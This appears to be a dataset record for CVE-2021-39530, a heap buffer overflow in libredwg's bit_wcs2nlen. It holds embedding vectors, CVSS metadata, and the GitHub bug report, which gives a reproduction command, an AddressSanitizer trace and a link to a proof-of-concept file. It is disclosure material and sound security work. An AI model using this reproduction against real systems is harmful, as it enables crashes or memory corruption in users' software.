0.002761225216090679, -0.005177297163754702, 0.0329546220600605, -0.014188795350492, 0.012095366604626179, 0.010309574194252491, -0.0025286220479756594, 0.004569527693092823, 0.014286339282989502, 0.0010354594560340047, -0.005800073500722647, -0.01149510033428669, -0.0045320107601583, -0.0025661385152488947, -0.01617717742919922, -0.0022341161966323853, -0.007923515513539314, 0.028722744435071945, 0.011427570134401321, 0.018668282777071, -0.02288515493273735, -0.017437737435102463, -0.02006390318274498, -0.020289001986384392, -0.012935739941895008, 0.010129494592547417, 0.016642384231090546, 0.0011480094399303198, -0.005132277030497789, -0.013978702947497368, -0.011142443865537643, 0.02196974866092205, 0.005432410631328821, -0.006445359904319048, -0.010069468058645725, -0.017872929573059082, 0.0005735357408411801, 0.018518216907978058, -0.0008975857635959983, 0.02713203802704811, 0.009424181655049324, -0.031033769249916077, -0.005706281866878271, -0.03811691328883171, 0.0035228130873292685, 0.0054811821319162846, -0.010939854197204113, -0.01206535380333662, -0.0030744890682399273, -0.02123442105948925, 0.020379042252898216, -0.000994191155768931, -0.015982091426849365, -0.0015091070672497153, 0.0034271457698196173, 0.0010016944725066423, 0.00748832244426012, -0.00006917131395312026, 0.005957643501460552, 0.018878376111388206, -0.015441851690411568, -0.023695513606071472, 0.007394530810415745, 0.007101901341229677, 0.0031401433516293764, 0.02097930945456028, -0.01340094581246376, 0.014721532352268696, 0.006685466505587101, 0.013040786609053612, 0.0017557790270075202, -0.00867384858429432, -0.017992984503507614, 0.01294324267655611, -0.0016844974597916007, 0.010737264528870583, 0.010309574194252491, -0.010219534859061241, 0.0097018051892519, 0.01220791693776846, 0.00041995197534561157, 0.006550406571477652, 0.0059839049354195595, -0.03610602021217346, -0.00432942109182477, 0.016087137162685394, -0.011817744001746178, 0.013423455879092216, -0.010797291062772274, -0.016687404364347458, 0.0018936527194455266, 0.0016207190928980708, 0.023755541071295738, 0.008013555780053139, 0.0014687767252326012, -0.005113518796861172, -0.022600028663873672, -0.01215539313852787, -0.011390053667128086, -0.01650732383131981, 0.0035228130873292685, 0.011645167134702206, 0.0037929329555481672, 0.006542903371155262, 0.0037891813553869724, 0.003063234267756343, -0.0011583265149965882, -0.00524482736364007, 0.025601359084248543, -0.003920489456504583, 0.005499940365552902, -0.005503692198544741, 0.0070531293749809265, 0.01691250503063202, -0.013378435745835304, -0.008996492251753807, -0.0005857286159880459, -0.006456614937633276, -0.0009744949056766927, -0.00637032650411129, -0.011855260469019413, 0.008538789115846157, -0.021114367991685867, 0.009011498652398586, -0.0214145015925169, 0.007266974542289972, 0.006831781473010778, 0.012132883071899414, 0.02009391598403454, 0.013776112347841263, 0.007402034476399422, 0.004933439195156097, 0.012680626474320889, 0.011990319937467575, 0.0029863249510526657, 0.004160596057772636, -0.0026918193325400352, -0.018503209576010704, 0.010999880731105804, 0.0024479611311107874, 0.0108948340639472, 0.012177903205156326, -0.01724265143275261, -0.011082417331635952, -0.005781315267086029, -0.002309149596840143, -0.0031232608016580343, 0.009431685321033001, 0.008066078647971153, 0.016942517831921577, 0.013363429345190525, 0.02713203802704811, -0.0005181987071409822, -0.006220260169357061, 0.02420574054121971, 0.012260439805686474, 0.003460910636931658, 0.0031457708682864904, 0.017842916771769524, 0.010016944259405136, 0.01449643261730671, 0.010767277330160141, -0.013663562946021557, 0.01673242449760437, 0.00036180115421302617, -0.0065954262390732765, 0.0002982573350891471, -0.009124048054218292, -0.028317565098404884, 0.004985962528735399, -0.024760987609624863, 0.02675687149167061, 0.023845581337809563, 0.027507204562425613, -0.001962120644748211, -0.005222317297011614, 0.00524482736364007, 0.003021965967491269, 0.002164710545912385, -0.03181411698460579, -0.006216508336365223, -0.024340800940990448, 0.0042093675583601, -0.0021778412628918886, -0.0093341413885355, 0.009754328057169914, 0.0008497520466335118, 0.007908509112894535, -0.00944669172167778, 0.003376498119905591, -0.007720925845205784, 0.025466300547122955, 0.028212517499923706, -0.001422818866558373, 0.00990439485758543, 0.011345033533871174, -0.027912385761737823, 0.003391504753381014, -0.014541451819241047, 0.03145395591855049, -0.0014687767252326012, -0.02347041480243206, -0.003370870603248477, 0.015726977959275246, -0.018608257174491882, -0.013108315877616405, -0.0012765038991346955, -0.025826459750533104, 0.01764783076941967, 0.002112187212333083, -0.001672304468229413, 0.0019396105781197548, -0.002275384496897459, -0.009529228322207928, 0.006467869970947504, 0.0166573915630579, -0.0028381342999637127, 0.007495826110243797, -0.007015612907707691, 0.00003344257493154146, -0.003652245504781604, 0.009964421391487122, 0.01599709875881672, -0.009784341789782047, 0.0325944609940052, -0.008343702182173729, -0.0035922189708799124, -0.017587803304195404, -0.0024629677645862103, -0.009229094721376896, 0.01566695235669613, -0.00393549632281065, 0.015531891956925392, -0.009311631321907043, 0.0011264373315498233, -0.008261165581643581, 0.01248553954064846, -0.009941911324858665, -0.022269882261753082, 0.0019049077527597547, -0.016342250630259514, 0.0015438100090250373, 0.0033408573362976313, 0.009941911324858665, -0.024010654538869858, -0.019388603046536446, -0.006107709836214781, -0.0019283556612208486, 0.009874381124973297, -0.0007057819166220725, -0.001191153540275991, 0.029608137905597687, 0.03613603487610817, 0.003671003971248865, 0.009806851856410503, 0.003509682370349765, -0.004408205859363079, -0.007056881207972765, -0.004749607294797897, -0.021114367991685867, -0.011720200069248676, 0.017107591032981873, 0.0166573915630579, -0.00432942109182477, 0.005980153568089008, -0.00193585897795856, -0.003410263219848275, 0.008973982185125351, -0.0007587741711176932, 0.009364155121147633, -0.00022322405129671097, 0.01090984046459198, 0.014691518619656563, -0.004648312460631132, 0.013108315877616405, -0.014158782549202442, -0.013761105947196484, 0.001475342083722353, 0.016192184761166573, -0.0020652913954108953, 0.020439069718122482, 0.004156844224780798, -0.004884667228907347, 0.006554157938808203, 0.004156844224780798, -0.0002668371598701924, -0.0020671673119068146, 0.012605593539774418, 0.023155273869633675, 0.01424131914973259, 0.020364034920930862, -0.007075639441609383, -0.011262496933341026, 0.007698415778577328, 0.008381218649446964, -0.000036402871046448126, 0.008816411718726158, 0.010467144660651684, -0.0129957664757967, 0.005267336964607239, -0.009311631321907043, 0.01688249036669731, 0.0026955711655318737, 0.0006570102996192873, -0.006178991869091988, -0.0151042016223073, 0.010114488191902637, 0.04733100160956383, 0.0013102688826620579, -0.005301102064549923, -0.01464649848639965, -0.009814354591071606, -0.005196055397391319, -0.03292460739612579, 0.013753602281212807, 0.0056124902330338955, 0.0204990953207016, 0.004295655991882086, -0.005214814096689224, -0.010257051326334476, 0.003856711322441697, 0.005541208665817976, -0.008726372383534908, 0.022314900532364845, 0.019688736647367477, -0.01746775023639202, 0.0038004363887012005, 0.020364034920930862, -0.025016099214553833, -0.004318166058510542, 0.016342250630259514, 0.0014969141921028495, -0.004929687362164259, -0.008793901652097702, -0.0012127256486564875, -0.01932857558131218, 0.006329058203846216, -0.006205253303050995, 0.010136998258531094, -0.024700960144400597, -0.029893264174461365, -0.011885273270308971, -0.017452744767069817, -0.008283675648272038, 0.003057606751099229, 0.0019208523444831371, 0.018143050372600555, -0.020679175853729248, -0.002770604332908988, -0.012012830004096031, 0.0043931994587183, 0.008163622580468655, -0.016342250630259514, -0.009176571853458881, 0.008951472118496895, -0.026171613484621048, 0.014353868551552296, 0.0023166530299931765, 0.003665376454591751, -0.0012915105326101184, 0.001069224439561367, -0.013520999811589718, 0.010324581526219845, -0.02090427465736866, -0.007660899311304092, 0.023380374535918236, -0.005736295133829117, 0.03379499539732933, 0.0019049077527597547, -0.00761587917804718, 0.00682802964001894, 0.00845625251531601, 0.008208642713725567, -0.009686797857284546, 0.0033052165526896715, -0.0009046201594173908, -0.007465812843292952, 0.01037710439413786, -0.01800798997282982, 0.006111461669206619, -0.008478762581944466, -0.01252305693924427, 0.004078059457242489, -0.012493043206632137, -0.009454195387661457, 0.0030651099514216185, 0.009986931458115578, 0.0072257062420248985, 0.0025867726653814316, 0.017932957038283348, 0.018578242510557175, 0.011224980466067791, 0.005807576701045036, -0.01599709875881672, 0.005289847031235695, -0.0024535886477679014, 0.008268669247627258, -0.023035220801830292, -0.0175727978348732, -0.023095248267054558, -0.000370945839677006, 0.009274114854633808, 0.013498489744961262, -0.01285320334136486, 0.006261528469622135, 0.007146921008825302, -0.008838921785354614, 0.01991383545100689, 0.003447779919952154, 0.01797797717154026, 0.002217233879491687, -0.01253806333988905, 0.02064916305243969, 0.018608257174491882, 0.00853128544986248, 0.021624594926834106, -0.01764783076941967, -0.021504541859030724, -0.03418516740202904, -0.010744767263531685, -0.00017163866141345352, -0.005289847031235695, -0.012230427004396915, -0.001069224439561367, -0.0329546220600605, -0.007885999046266079, 0.020183956250548363, 0.009964421391487122, 0.010099480859935284, 0.02273508720099926, 0.007131914608180523, -0.007720925845205784, -0.003973012790083885, 0.009409175254404545, 0.0057100336998701096, 0.01566695235669613, -0.017662838101387024, 0.0033633674029260874, 0.022509988397359848, -0.007653396110981703, -0.021909721195697784, 0.054053984582424164, 0.020529108121991158, 0.020559122785925865, 0.0081486152485013, 0.0007644016877748072, 0.014939128421247005, -0.0042693945579230785, -0.015501878224313259, -0.011119933798909187, 0.015194241888821125, 0.014451412484049797, -0.007788456045091152, 0.01670241169631481, -0.012958250008523464, 0.004351931158453226, 0.013295899145305157, -0.011547624133527279, 0.00840372871607542, -0.011585140600800514, -0.01713760383427143, -0.009251604788005352, -0.006572916638106108, 0.017932957038283348, -0.021144382655620575, 0.0024723471142351627, 0.0043144142255187035, -0.010136998258531094, 0.000710002554114908, 0.0076834093779325485, -0.01607213169336319, 0.016792450100183487, -0.01563693769276142, -0.01805301010608673, 0.02039404958486557, 0.006036428268998861, 0.009026505053043365, 0.011555126868188381, 0.013911172747612, 0.004528259392827749, -0.01135253719985485, -0.013513496145606041, 0.007931019179522991, -0.004186857957392931, 0.012830693274736404, 0.006632943172007799, -0.005972649902105331, 0.0017932957271113992, 0.0002726991369854659, 0.00216846214607358, 0.01563693769276142, 0.018022997304797173, 0.013978702947497368, 0.0011226856149733067, 0.00649038003757596, 0.001298076007515192, -0.014263829216361046, -0.007713422644883394, 0.0009885636391118169, 0.004550768993794918, -0.020003875717520714, -0.005064747296273708, -0.007439550943672657, -0.020334022119641304, 0.0011086169397458434, -0.02456589974462986, -0.018143050372600555, 0.0008624139009043574, 0.013978702947497368, -0.022359920665621758, 0.011757717467844486, 0.004224374424666166, 0.008178628981113434, -0.0030913716182112694, -0.007086894474923611, -0.020123928785324097, -0.01962870918214321, 0.01563693769276142, -0.014068742282688618, 0.008553795516490936, 0.01367106568068266, -0.002706825966015458, -0.01907346397638321, 0.006655453238636255, -0.009011498652398586, -0.0035359440371394157, -0.012020333670079708, -0.006512889638543129, -0.008291179314255714, -0.012703136540949345, 0.018548229709267616, 0.007705918978899717, 0.003791057039052248, -0.029082903638482094, -0.0203190166503191, 0.006407843437045813, -0.014578969217836857, -0.0004952197195962071, -0.0026205377653241158, 0.002718080999329686, 0.01535931508988142, 0.00886143185198307, 0.023860586807131767, -0.03169406205415726, -0.0036503698211163282, 0.01215539313852787, -0.02438582107424736, 0.005466175265610218, -0.014353868551552296, -0.007169431075453758, -0.005079754162579775, 0.005901368334889412, -0.0032958374358713627, -0.021984754130244255, 0.001695752376690507, 0.018218083307147026, -0.000933226605411619, 0.0006246521370485425, 0.004749607294797897, 0.018113037571310997, 0.0035640813875943422, -0.006422849837690592, 0.005015975795686245, 0.019313570111989975, 0.015396831557154655, 0.009491711854934692, -0.010932350531220436, 0.008718868717551231, 0.023425394669175148, 0.007338256109505892, 0.0120803602039814, -0.0032939615193754435, -0.023110253736376762, 0.014894108287990093, 0.006794264540076256, 0.008043568581342697, 0.0031551499851047993, -0.009874381124973297, 0.017257656902074814, 0.021579574793577194, 0.01048965472728014, 0.00010528109123697504, 0.04399952292442322, -0.005218565464019775, 0.00682802964001894, -0.014909115619957447, 0.0061677368357777596, -0.01162265706807375, -0.004899674095213413, 0.002706825966015458, -0.026996979489922523, 0.005653758533298969, 0.0061564818024635315, 0.012680626474320889, -0.001199594815261662, -0.0052523305639624596, -0.00570253049954772, 0.019793782383203506, 0.01833813637495041, -0.014886605553328991, 0.007240712642669678, -0.007968535646796227, 0.0006476311245933175, 0.0015663199592381716, 0.020934289321303368, 0.002376679563894868, 0.006220260169357061, -0.003402759786695242, -0.00785598624497652, 0.01411376241594553, -0.01004695799201727, -0.015456858091056347, -0.003867966355755925, 0.003393380669876933, -0.0081486152485013, 0.012110373936593533, 0.014211305417120457, 0.01345346961170435, -0.005177297163754702, 0.02145952172577381, 0.01566695235669613, 0.013408449478447437, 0.0034496556036174297, -0.021069347858428955, 0.015224255621433258, 0.04366937652230263, 0.005387390498071909, -0.005492437165230513, -0.017452744767069817, 0.011532616801559925, 0.016747431829571724, -0.0027893625665456057, -0.024010654538869858, 0.019688736647367477, -0.01478906162083149, -0.01127750426530838, 0.021684622392058372, 0.013963695615530014, -0.002982573350891471, 0.02723708562552929, -0.013265886344015598, 0.0010617211228236556, -0.02482101321220398, -0.025241199880838394, 0.0217896681278944 ]
222
CVE-2021-39530
2021-09-20T16:15:12.163000
An issue was discovered in libredwg through v0.10.1.3751. bit_wcs2nlen() in bits.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/258" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/258
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwgbmp (latest master [39ef943](https://github.com/LibreDWG/libredwg/commit/39ef9439f35111170258cf57cc0c58eabc4748c7)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwgbmp ./heap-overflow-bit_wcs2nlen-bit-1636 ## AddressSanitizer output ``` ================================================================= ==23940==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000ec80 at pc 0x558b22fdc723 bp 0x7ffe585f6d40 sp 0x7ffe585f6d30 READ of size 2 at 0x61600000ec80 thread T0 #0 0x558b22fdc722 in bit_wcs2nlen /home/seviezhou/libredwg/src/bits.c:1636 #1 0x558b22c13540 in dwg_decode_LTYPE_private /home/seviezhou/libredwg/src/dwg.spec:3020 #2 0x558b2308fb8d in dwg_decode_LTYPE /home/seviezhou/libredwg/src/dwg.spec:2936 #3 0x558b2308fb8d in dwg_decode_add_object /home/seviezhou/libredwg/src/decode.c:5669 #4 0x558b23097a03 in read_2004_section_handles /home/seviezhou/libredwg/src/decode.c:2843 #5 0x558b23097a03 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3680 #6 0x558b230a5a36 in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #7 0x558b22f9edec in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #8 0x558b22f9ce28 in get_bmp /home/seviezhou/libredwg/programs/dwgbmp.c:120 #9 0x558b22f9bed0 in main /home/seviezhou/libredwg/programs/dwgbmp.c:301 #10 0x7f0a4446eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x558b22f9c6a9 in _start (/home/seviezhou/libredwg/programs/dwgbmp+0x4e76a9) 0x61600000ec81 is located 0 bytes to the right of 513-byte region [0x61600000ea80,0x61600000ec81) allocated by thread T0 here: #0 0x7f0a44c747aa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987aa) #1 0x558b22fd7de8 in bit_read_TF /home/seviezhou/libredwg/src/bits.c:1444 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libredwg/src/bits.c:1636 bit_wcs2nlen Shadow bytes around the buggy address: 0x0c2c7fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff9d90:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==23940==ABORTING ``` ## POC [heap-overflow-bit_wcs2nlen-bit-1636.zip](https://github.com/LibreDWG/libredwg/files/5011540/heap-overflow-bit_wcs2nlen-bit-1636.zip)
Heap overflow due to incomplete fix for issues #255
https://api.github.com/repos/LibreDWG/libredwg/issues/258/comments
0
2020-08-02T02:25:59
2020-08-02T12:15:29Z
https://github.com/LibreDWG/libredwg/issues/258
671,412,127
258
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Heap overflow due to incomplete fix for issues #255 Issue date: --- start body --- ## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwgbmp (latest master [39ef943](https://github.com/LibreDWG/libredwg/commit/39ef9439f35111170258cf57cc0c58eabc4748c7)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwgbmp ./heap-overflow-bit_wcs2nlen-bit-1636 ## AddressSanitizer output ``` ================================================================= ==23940==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000ec80 at pc 0x558b22fdc723 bp 0x7ffe585f6d40 sp 0x7ffe585f6d30 READ of size 2 at 0x61600000ec80 thread T0 #0 0x558b22fdc722 in bit_wcs2nlen /home/seviezhou/libredwg/src/bits.c:1636 #1 0x558b22c13540 in dwg_decode_LTYPE_private /home/seviezhou/libredwg/src/dwg.spec:3020 #2 0x558b2308fb8d in dwg_decode_LTYPE /home/seviezhou/libredwg/src/dwg.spec:2936 #3 0x558b2308fb8d in dwg_decode_add_object /home/seviezhou/libredwg/src/decode.c:5669 #4 0x558b23097a03 in read_2004_section_handles /home/seviezhou/libredwg/src/decode.c:2843 #5 0x558b23097a03 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3680 #6 0x558b230a5a36 in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #7 0x558b22f9edec in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #8 0x558b22f9ce28 in get_bmp /home/seviezhou/libredwg/programs/dwgbmp.c:120 #9 0x558b22f9bed0 in main /home/seviezhou/libredwg/programs/dwgbmp.c:301 #10 0x7f0a4446eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x558b22f9c6a9 in _start (/home/seviezhou/libredwg/programs/dwgbmp+0x4e76a9) 0x61600000ec81 is located 0 bytes to the right of 513-byte region [0x61600000ea80,0x61600000ec81) allocated by thread T0 here: #0 0x7f0a44c747aa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987aa) #1 0x558b22fd7de8 in bit_read_TF /home/seviezhou/libredwg/src/bits.c:1444 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libredwg/src/bits.c:1636 bit_wcs2nlen Shadow bytes around the buggy address: 0x0c2c7fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff9d90:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==23940==ABORTING ``` ## POC [heap-overflow-bit_wcs2nlen-bit-1636.zip](https://github.com/LibreDWG/libredwg/files/5011540/heap-overflow-bit_wcs2nlen-bit-1636.zip) --- end body ---
3,817
[ -0.014242502860724926, 0.029199736192822456, -0.011614377610385418, 0.010966653004288673, 0.06015652045607567, 0.038863494992256165, 0.00391240743920207, 0.04630860686302185, -0.02818720042705536, 0.003696498926728964, -0.010802860371768475, 0.0008254770073108375, 0.0012954497942700982, -0.00012237906048540026, 0.00126846123021096, 0.025298496708273888, -0.01585809327661991, 0.02065274491906166, -0.013736234977841377, -0.006041709799319506, 0.017942724749445915, -0.026236580684781075, -0.019014820456504822, 0.03335411101579666, -0.019506197422742844, 0.004441010300070047, 0.00735577242448926, 0.009633976966142654, -0.007951381616294384, 0.021427037194371223, 0.01450308132916689, 0.029274187982082367, 0.0014238780131563544, 0.0132076321169734, 0.03231179341673851, -0.007124973926693201, 0.04708290100097656, 0.10173003375530243, 0.00348989712074399, 0.0025145872496068478, 0.006023096852004528, -0.056493524461984634, -0.0092617217451334, 0.024315740913152695, 0.008889465592801571, 0.006767608225345612, -0.004709034692496061, 0.004091090057045221, -0.04758916795253754, -0.018627675250172615, 0.0150986909866333, -0.01348310150206089, -0.030212271958589554, -0.0473211444914341, 0.030033588409423828, -0.010155134834349155, 0.029691113159060478, 0.04094812646508217, 0.0014471439644694328, 0.0111527806147933, -0.031597062945365906, 0.011763280257582664, 0.00850976537913084, 0.0295124314725399, -0.01818096823990345, 0.0010544141987338662, -0.025015583261847496, 0.032698940485715866, -0.030152710154652596, -0.01576875150203705, -0.028246762230992317, -0.009291501715779305, 0.013736234977841377, 0.022826718166470528, 0.026727957651019096, 0.0015160113107413054, 0.02826165221631527, -0.00394591037184, -0.048393238335847855, 0.04303275793790817, -0.024196619167923927, 0.028365883976221085, -0.02251402474939823, 0.03463466838002205, 0.015694299712777138, 0.00704680010676384, -0.031061014160513878, -0.07993074506521225, -0.0397866889834404, -0.043181661516427994, 0.0007626588339917362, 0.023005401715636253, 0.013036394491791725, 0.003151144366711378, -0.01560495886951685, -0.007802479434758425, -0.04094812646508217, -0.003942187875509262, -0.050328969955444336, -0.005788575857877731, -0.025432508438825607, -0.015336934477090836, -0.020474063232541084, 0.017138652503490448, 0.03150772303342819, 0.008316191844642162, 0.005825801752507687, -0.01949130743741989, 0.02648971416056156, 0.10446983575820923, 0.00562478369101882, -0.01969977095723152, -0.03252025693655014, 0.029274187982082367, -0.0164685919880867, 0.02647482417523861, 0.03799986094236374, -0.007195702288299799, -0.03558764234185219, -0.0030729707796126604, -0.006678266916424036, -0.03058452717959881, -0.03936976194381714, -0.006332069169729948, -0.007899265736341476, 0.017615139484405518, -0.0072068702429533005, -0.027934066951274872, -0.03600456938147545, -0.02841055393218994, -0.04172241687774658, -0.044075075536966324, -0.004333056043833494, -0.024449754506349564, 0.004794653505086899, 0.006306011229753494, -0.004522906616330147, 0.041394833475351334, 0.010415714234113693, 0.000005943731139268493, -0.0645044669508934, -0.04008449241518974, 0.019297735765576363, -0.0016798038268461823, -0.005111070815473795, 0.012902381829917431, -0.02866368740797043, 0.018746796995401382, -0.004132037982344627, 0.01736200600862503, -0.010125354863703251, -0.02202264592051506, 0.038863494992256165, 0.012329108081758022, 0.037076666951179504, -0.020399611443281174, 0.012224877253174782, 0.03240113705396652, -0.0037467535585165024, -0.016766395419836044, -0.0031846475321799517, -0.036749083548784256, 0.010385933332145214, -0.02934863790869713, -0.043598584830760956, -0.005818356294184923, 0.01358733233064413, 0.025506960228085518, 0.006819724105298519, 0.018493663519620895, -0.006663376931101084, 0.002330320654436946, 0.001556959468871355, 0.02181418426334858, -0.06867372989654541, -0.00895647145807743, 0.003998026251792908, 0.020265599712729454, -0.02394348569214344, -0.002363823587074876, -0.002868229988962412, -0.007996052503585815, 0.0007998844375833869, 0.021784402430057526, 0.02187374420464039, -0.016289908438920975, 0.013028949499130249, -0.012463120743632317, 0.006883007939904928, -0.011055993847548962, -0.010028568096458912, -0.017525797709822655, 0.015076355077326298, -0.029929356649518013, 0.0418713204562664, -0.026445044204592705, -0.028246762230992317, -0.015872983261942863, 0.025834545493125916, -0.0007193841156549752, -0.014115936122834682, 0.03347323089838028, -0.0576251819729805, 0.01495723333209753, -0.02297562174499035, 0.005159463733434677, -0.024747557938098907, 0.0349920354783535, 0.04011427238583565, -0.034396424889564514, -0.014421185478568077, -0.0048914398066699505, 0.00895647145807743, 0.0006323693669401109, -0.01880635693669319, 0.022201329469680786, 0.006834614556282759, 0.004351668991148472, -0.007221760228276253, 0.011368689127266407, 0.008115174248814583, -0.010244476608932018, -0.006499584298580885, -0.0062799532897770405, -0.05479603633284569, -0.0052376375533640385, 0.015530507080256939, 0.014532862231135368, -0.005360481794923544, 0.013557552359998226, 0.049554675817489624, -0.025626081973314285, 0.01955086924135685, -0.0011335185263305902, 0.012366333976387978, -0.008070503361523151, -0.000165188466780819, 0.005192966666072607, -0.03129925951361656, 0.00919471587985754, -0.001259154872968793, 0.027144884690642357, -0.009023478254675865, -0.02921462617814541, 0.008740563876926899, 0.042228683829307556, -0.018493663519620895, -0.0014713406562805176, -0.011003877967596054, 0.004660641308873892, -0.00023324145877268165, -0.005520551931113005, 0.02422640100121498, -0.0057215699926018715, 0.005836969241499901, -0.007262708619236946, 0.021486598998308182, 0.027740493416786194, -0.01022214163094759, -0.03045051544904709, 0.02346699871122837, 0.024047717452049255, -0.011525035835802555, 0.018776576966047287, 0.0032553761266171932, -0.008204515092074871, -0.011130444705486298, 0.03171618655323982, 0.00932872761040926, -0.027264006435871124, 0.02255869470536709, -0.028827480971813202, 0.008174735121428967, -0.018836138769984245, -0.01791294291615486, 0.005773685872554779, 0.015426276251673698, 0.015560287982225418, 0.028797701001167297, -0.01475621573626995, 0.01334164384752512, 0.0336221344769001, -0.017689591273665428, 0.01165904849767685, -0.017466237768530846, -0.02963155321776867, 0.005788575857877731, 0.0027249115519225597, -0.021159013733267784, -0.020608074963092804, -0.014242502860724926, -0.016587713733315468, -0.04615970700979233, 0.0025145872496068478, 0.00939573347568512, 0.02491135150194168, -0.007869484834372997, -0.014867892488837242, -0.011294237338006496, -0.01618567667901516, -0.009827550500631332, -0.017138652503490448, -0.027874507009983063, -0.028097858652472496, -0.015679409727454185, -0.008502320386469364, -0.03463466838002205, 0.013081065379083157, -0.03478357195854187, 0.0025890383403748274, 0.0555703304708004, -0.04347946494817734, -0.004120870493352413, 0.002036238554865122, -0.01804695650935173, -0.006373017560690641, 0.011897291988134384, -0.02173973247408867, -0.01495723333209753, 0.019089272245764732, -0.051430847495794296, 0.003346578683704138, -0.030376063659787178, 0.006994684226810932, 0.02181418426334858, -0.0003471284289844334, -0.018985040485858917, 0.027427799999713898, -0.05062677338719368, 0.014101045206189156, 0.0058965301141142845, 